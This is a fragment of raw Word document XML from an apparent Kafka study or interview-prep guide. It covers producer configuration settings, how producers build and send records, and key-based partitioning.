        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="183F5256" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA" w:rsidP="00E51096">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51096">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="14E68BD3" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A54BDD9" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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acks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600402A6" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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0, 1, or all – defines durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="521C6879" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8ED83E" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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retries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620AC45F" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Retry count on failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="38D4F0DF" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26E0BC61" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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linger.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16A7A796" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Wait time to batch messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51096" w:rsidRPr="00E51096" w14:paraId="4C572920" w14:textId="77777777" w:rsidTr="00C46ACA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C296A82" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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batch.size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE7F2B7" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00E51096" w:rsidRDefault="00C46ACA"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Max batch size (in bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46D197E0" w14:textId="77777777" w:rsidR="00C46ACA" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00C46ACA">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D07FF79">
          <v:rect id="_x0000_i3098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D91043B" w14:textId="550FBAD7" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="007C61B8" w:rsidP="007C61B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="771" w:name="_Toc196308251"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Describe the Kafka producer role and how it sends messages to Kafka topics, including partitioning and message key concepts?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="771"/>
    </w:p>
    <w:p w14:paraId="714B6F93" w14:textId="549A2071" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Here's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detailed breakdown of a Kafka Producer's role</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message sending mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning logic using message keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76044F83" w14:textId="77777777" w:rsidR="001E64A1"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72B17D8">
          <v:rect id="_x0000_i3099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B5133" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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What is a Kafka Producer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1616C7B4" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a client that sends (publishes) </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>messages (records)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F80462" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>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Producers are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>entry point of data</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCDBB8" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>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Each message has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optional headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711623EB" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>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Producers can </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>choose the partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or let Kafka determine it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CEBDF" w14:textId="77777777" w:rsidR="001E64A1"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B3E8EBD">
          <v:rect id="_x0000_i3100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1D3CE" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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How Kafka Producer Sends Messages?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7547612C" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>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Producer prepares a message</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (called ProducerRecord):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E67BEEF" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>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ProducerRecord&lt;String, String&gt; record = new ProducerRecord&lt;&gt;("orders", "order-123", "Item A");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D14AAAA" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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lastRenderedPageBreak/>
        <w:t>"orders" = topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE445C7" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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order-123" = key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55AD3E" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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Item A" = value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE42E70" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>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KafkaProducer</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instance sends the record:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D675E6" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>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producer.send(record);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75D217" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>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Message goes through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609BEE1" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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Serialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECA7C4" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECBE80" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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Batching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50552C76" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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Compression (if configured)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E977D5C" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1292"/>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Sent over the network to Kafka broker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1321A" w14:textId="77777777" w:rsidR="001E64A1"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9F6B742">
          <v:rect id="_x0000_i3101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDBD6B3" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Partitioning Logic in Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C88743" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Kafka topics are split into </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism and scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFA074E" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka determines the partition using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F71FD0" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1293"/>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If key is provided</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C5EA8" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1293"/>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partition = hash(key) % number_of_partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381822AE" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1"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Ensures all records with the same key go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → preserves order per key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F74A46" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1293"/>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If key is NOT provided</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Uses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E929D5" w14:textId="77777777" w:rsidR="001E64A1" w:rsidRPr="00E51096" w:rsidRDefault="001E64A1" w:rsidP="00E51096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1293"/>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Round-robin strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00E51096">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across available partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F6B862" w14:textId="77777777" w:rsidR="001E64A1"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8E14D92">
